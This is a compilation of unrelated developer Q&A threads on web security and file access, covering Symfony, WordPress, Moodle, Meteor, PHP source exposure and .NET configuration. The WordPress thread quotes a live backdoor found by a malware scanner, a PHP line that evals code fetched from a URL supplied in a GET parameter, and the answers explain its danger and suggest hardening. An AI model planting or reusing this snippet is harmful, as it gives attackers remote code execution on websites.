Symfony not found static files (images, js, txt) - symfony

How can Symfony deliver static files without bootstrapping/executing the framework?
For example: if some requests are failing by the webserver(images, js files are not found or something like this) then the framework tries to solve the route. Of course this does not exists.
Is there a way to avoid this or blacklist these extensions?

It could be a cache problem.
If it is :
If it is a cache problem, you could try to clear the cache on the symfony console with cache:clear. If it doesn't work you could try to remove the ressources in the general folder, leaving the original ones in your bundle, and running assetic:dump and assets:install.
If it isn't
Regarding the "remove-symfony-routing" thing, I don't know if it's possible, but it should not done anyways.
What you're asking is to be able to access, from the client side, any file on the server, which constitutes a major security breach.
This could allow the client to get any file on the server, meaning he could get his hands on your javascript or php files which most of the time contain valuable information (such as how your app works or even deadlier : global passwords and config values)
What you could do to access resources from the client would be a route that points to a controller function that could output to browser the file you're looking for, provided that it has an extension you'd be ok to share. For example you could allow any image file but forbid code files such as php or javascript.
EDIT: Or yeah, configure your webserver correctly. 2 simple answers while I was typing :D


Wordpress warning - Backdoor:PHP/numeric.rce.8527

I have been looking at the Wordfence scan results on my site this morning and see 17 instances which seem to imply malware has ben installed on the server. I would be surprised if this were to be the case but wanted to be sure:
One example,
Filename: wp-admin/menu-header-cron.php
File Type: Not a core, theme, or plugin file from
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0aif (isset($_GET['limit'])) {\x0a eval(file_get_contents('http://' . $_GET['limit']));\x0a}
The issue type is: Backdoor:PHP/numeric.rce.8527
Description: Remote code execution malware
Looking at the file in question, the content of this file is:
if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));
Can anyone confirm whether this is an innocent file or something I need to quarantine/delete?
Also, has was this file created? It implies that remote code has the capability of creating new files in the wp-admin/ sub folder? Is there not a simple way to prevent this which would preclude any further instances.
Many thanks for any input
Yes, this is a dangerous file as already mentioned by #Everlyn Woodley. eval() is not considered safe in production at all.
Further to verify, a quick grep "isset($_GET['limit'])" on source file of latest Wordpress package tells that its not part of it, hence again a dangerous code.
Yes, someone is able to upload files on your server. Probably they have uploaded some kind of web-shell and can manipulate any file on your hosting account. Its pretty common though.
To prevent it in future (given that you have successfully cleaned your current WP install), you can do few things, (there are plenty of articles so it would be redundant) but mentioning few might not hurt here:
Install or enable mod_security on server level
Always make sure you have latest Wordpress as well plugins
Use minimal plugins.
Simple but effective: Change location of wp-plugin and theme folders.
( )
If you examine access log of a regular WP install, you will notice that there are tons of bots hitting with known-vulnerabilities mostly targeting plugins folder, simply changing plugins folder location along with other security measures mentioned above can significantly reduce such hacks.
That snippet is reading the limit parameter then passing is as an URL to get a file. And eval function will just execute it
So its pretty dangerous

Is there a possibility to encrypt media files uploaded in Moodle?

I've run into a problem using Moodle 3.2. I'm uploading mp3-files to be played in a quiz. I have the license to use those files for that specific purpose, but I am not the owner. Thus, I would like to ensure that nobody without a Moodle account can access these files.
However, the path to the files can be extracted from the source code and once you have the path, anybody can access the file. Is there any way to protect the file so only registered users can access it, even if they have the direct path?
Thank you so much!
All the best
EDIT: I've learned that files actually are encrypted by login - I just had the login cookie remaining in several browsers and thus was able to access them.
Are the files served by moodleinstallation/pluginfile.php/? This would include login/permission checks

Meteor uploads file upload/download permission

I am building a notes functionality with attachments in it, I have been using Meteor Uploads for file uploading. Everything works fine except for permissions. I have searched almost everything related to this but somehow I can not find a full example neither a clear answer.
There is an event shown below which is supposed to handle permission checks, but this does not run in fibre, so you have no access to collections and UserId
validateRequest: function (req, resp) {
There are two issues I am trying to solve:
Allow only the users that have permission to post notes, to be able to upload files.
A way to provide more secure file accessing
The first one would not exist as an issue if there was a way to call file start upload in server(As far as I know/tried it is only called in client)., e);
I have made some security checks before uploading file(calling a server method) but that is in client. I have also added a cookie after opening the page which I then validate in server in order to make files not accessible out of app.
I have also read that permissions can be achieved by using tokens/secret keys as mentioned here but could not find a proper example.
Maybe the first issue is not a real issue in my scenario because I have permission checks when showing Note post ability but I wanted to know what is a good approach I could take.
Most important issue I believe is the second one regarding file access, what is a proper way to serve files based on User permission? Also a good way to encrypt uploading file's name so that users do not access files by guessing the file name might be helpful.
Thank you guys!

Is there a way to download a PHP/ASP/whatever source code without processing it, as plain text?

Suppose the URL If I type this URL on the browser address bar, the PHP code is executed, and its output is returned to me. Fine. But, what if instead of executing it, I wanted to view it's source as plain text. Is there a a way to issue such request?
I believe that there must be some way, and my concern is that some outsider could retrieve sensitive code, such as configurations file, by guessing it's location. For example, Joomla instalations have a configuration.php on it's root folder. If someone retrieves such file as plain text, then these database credentials have been seriously compromised. Obviously, this could be prevented with proper permissions, but it's just too common to just issue 0777 as everything permissions and forgetting about access denials.
For PHP: if properly configured, there is no way to download it. File permissions won't help either way, as the webserver needs to be able to read the files, and that's the one serving contents. However. a webserver can for instance be configured to serve them with x-httpd-php-source, or the PHP/webserver configuration may be broken. Which is why files which don't need direct access (db config, class definitions, etc.) should be outside the document root, so there is no way those files will get served by accident even when the webserver config is incorrect / failing. If your current hoster does not allow you to store files outside the document root, switch hosting a.s.a.p.
There is a way to issue such request that downloads the source code of if the server is configured to provide a URL to do so. Usually it isn't, so usually there is no way to issue such a request.

How to change configuration in memory

Im wondering if this is possible. I would really like to ship my application with no configuration file (stop users fiddling with it). Is it possible to set all the configuration in memory in say the global.asax (application_start) event? For example I dont want users messing directly with the connection string I want them to be able to modify it in the gui only. And i dont want to have to write to the config file as there may be security issues....
you could still use the file system and have the files encrypted. In this way only you can modify or from the app, but no one can really modify the configurations directly from the file. Also you could encrypt Configuration Sections: Check this Microsoft Link out.
Good luck!
